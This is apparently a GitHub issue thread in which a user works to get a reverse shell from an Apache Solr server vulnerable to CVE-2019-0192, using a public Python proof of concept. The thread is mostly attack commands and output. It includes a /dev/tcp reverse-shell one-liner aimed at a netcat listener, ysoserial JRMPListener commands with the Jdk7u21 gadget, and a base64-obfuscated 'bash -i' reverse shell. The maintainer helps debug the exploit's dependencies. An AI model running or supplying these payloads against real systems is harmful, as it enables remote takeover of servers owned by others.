CVE-2019-0192
Trying to get reverse shell
Hi,
I've been trying lately to get a reverse shell in my LAN on my vulnerable Apache Solr server with the PoC available in your GitHub repo, but for some reason I can't receive the reverse shell when triggering the Python script:
root@localhost:/home/syrius/solr/CVE-2019-0192# python3 CVE-2019-0192.py http://192.168.1.142:8983
CVE-2019-0192 - Apache Solr RCE 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5
[+] Checking if ressource available => /solr/dovecot/config
command (not reflected)> 0<&196;exec 196<>/dev/tcp/192.168.1.101/1092; sh <&196 >&196 2>&196
[+] Copy file to tmp directory => Traceback (most recent call last):
File "CVE-2019-0192.py", line 59, in <module>
r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json)
File "/usr/lib/python3/dist-packages/requests/api.py", line 88, in post
return request('post', url, data=data, **kwargs)
File "/usr/lib/python3/dist-packages/requests/api.py", line 44, in request
return session.request(method=method, url=url, **kwargs)
TypeError: request() got an unexpected keyword argument 'json'
root@localhost:/home/syrius/solr/CVE-2019-0192# * Opening JRMP listener on 1099
192.168.1.142 = Vulnerable Apache Solr in the LAN
192.168.1.101 = netcat listener on port 1092
Any help would be very appreciated,
Thanks
Hello,
Can you try to update your requests package:
pip3 show requests | grep Version
pip3 install --upgrade requests
pip3 show requests | grep Version
root@localhost:/home/syrius/solr/CVE-2019-0192# pip3 show requests | grep Version
Version: 2.2.1
root@localhost:/home/syrius/solr/CVE-2019-0192# pip3 requests --upgrade
ERROR: unknown command "requests"
root@localhost:/home/syrius/solr/CVE-2019-0192# pip3 install requests --upgrade
Collecting requests
Downloading https://files.pythonhosted.org/packages/7d/e3/20f3d364d6c8e5d2353c72a67778eb189176f08e873c9900e10c0287b84b/requests-2.21.0-py2.py3-none-any.whl (57kB)
100% |████████████████████████████████| 61kB 1.6MB/s
Requirement already satisfied, skipping upgrade: chardet<3.1.0,>=3.0.2 in /usr/local/lib/python3.6/dist-packages (from requests) (3.0.4)
Requirement already satisfied, skipping upgrade: idna<2.9,>=2.5 in /usr/local/lib/python3.6/dist-packages (from requests) (2.8)
Collecting urllib3<1.25,>=1.21.1 (from requests)
Downloading https://files.pythonhosted.org/packages/62/00/ee1d7de624db8ba7090d1226aebefab96a2c71cd5cfa7629d6ad3f61b79e/urllib3-1.24.1-py2.py3-none-any.whl (118kB)
100% |████████████████████████████████| 122kB 4.7MB/s
Requirement already satisfied, skipping upgrade: certifi>=2017.4.17 in /usr/local/lib/python3.6/dist-packages (from requests) (2018.11.29)
Installing collected packages: urllib3, requests
Found existing installation: urllib3 1.7.1
Cannot uninstall 'urllib3'. It is a distutils installed project and thus we cannot accurately determine which files belong to it which would lead to only a partial uninstall.
root@localhost:/home/syrius/solr/CVE-2019-0192# pip3 show requests | grep Version
Version: 2.2.1
You need requests>=2.4.2; the version you have is very outdated: 2014-01-23.
All right, will dig to find a way to upgrade and come back to let you know if all is working fine, thanks!
All good, getting a connection from the JRMP listener. Trying to get a rev shell but no connections yet from the netcat listener. Syntax should be (I believe):
java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 "0<&196; exec 196<>/dev/tcp/IP/PORT; sh <&196 >&196 2>&196"
Try with a simple command like touch /tmp/solrpwn.txt, does it work?
Yep, simple cmd works; now rev shell is a little bit more challenging, might need to do something similar to:
java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAxLzEzMzcgMD4mMQ==}|{base64,-d}|{bash,-i}"
Why not follow the Python PoC?